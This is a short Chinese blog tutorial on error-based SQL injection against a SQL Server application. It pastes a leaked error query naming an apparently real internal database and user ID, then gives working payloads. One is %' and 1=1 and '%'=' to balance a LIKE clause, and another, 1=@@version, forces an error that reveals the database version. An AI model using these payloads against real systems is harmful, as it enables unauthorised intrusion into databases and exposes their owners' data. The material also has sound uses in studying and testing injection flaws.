利用永真条件来实现sql注入方法

Q:遇到报错的sql注入,怎么办?

 

 

 

 

1、首先,先把部分语句给copy下来:

SELECT @Total=COUNT(1) FROM (select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%') T SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY FProcStatus ASC,FCreationDate DESC) AS RowNumber,* FROM ( select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%' ) AS N ) AS A WHERE A.RowNumber BETWEEN 1 AND 8 at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() at System.Data.SqlClient.SqlDataReader.get_MetaData() at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) at 。。。。。。(后面很有很长的sql语句)

 

2、面对复杂的语句,如何下手? 可以把上面的语句简化,容易分析

SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B'%')  。。。。。。(后面还有很多就不管了)

 

好了,下面开始研究如何注入。

 

利用永真条件来实现sql注入方法:
(如果不使用永真条件进行判断的话,使用 ' and 1=@@version+-- 那么很复杂的语句的话,会破坏掉整个sql语句的逻辑,导致执行sql查询失败,最终也无法得到版本)

1、如果遇到很复杂的语句怎么办? 那么我们就把复杂的语句简化为下面这条语句,以免乱军心:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B%')

2、插入语句: %' and 1=1 and '%'=' 可以让语句拼接正常,而不会报错
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=1 and '%'='%')

3、开始搞事情:把 1=1 改为 1=@@version 就会把“真”变成“假”,那么数据库将会报错,就会爆出数据库版本
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=@@version and '%'='%')

 

 

posted @ 2020-12-01 18:00  relax.1949  阅读(887)  评论(0编辑  收藏  举报